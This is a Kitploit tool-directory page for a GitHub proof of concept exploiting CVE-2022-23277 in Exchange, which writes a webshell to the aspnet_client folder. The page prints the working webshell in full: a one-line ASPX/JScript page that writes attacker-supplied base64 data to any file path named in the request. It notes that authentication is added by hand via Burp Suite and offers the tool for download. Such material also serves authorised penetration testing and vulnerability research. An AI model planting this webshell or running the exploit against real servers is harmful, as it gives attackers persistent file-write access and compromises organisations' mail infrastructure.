Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-23277 — CVE-2022-23277 POC to write a webshell to aspnet_client | Kitploit
Tools/GitHubGitHub/7bitsteam/cve-2022-23277
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHub7bitsteam/cve-2022-23277

CVE-2022-23277

CVE-2022-23277 POC to write a webshell to aspnet_client

View Repository
823 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

exch_CVE-2021-42321

This article is a tool related to the article "DotNet Security - CVE-2022-23277 Vulnerability Reproduction" by the 7bits Security Team.

The authentication part needs to be manually added via Burp Suite. After successful exploitation, it will write 1.aspx to aspnet_client.

webshell:

root@kitploit:~
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>

For details on exploitation, refer to our article.

Welcome to follow our official account - Zbits2022

Download Tool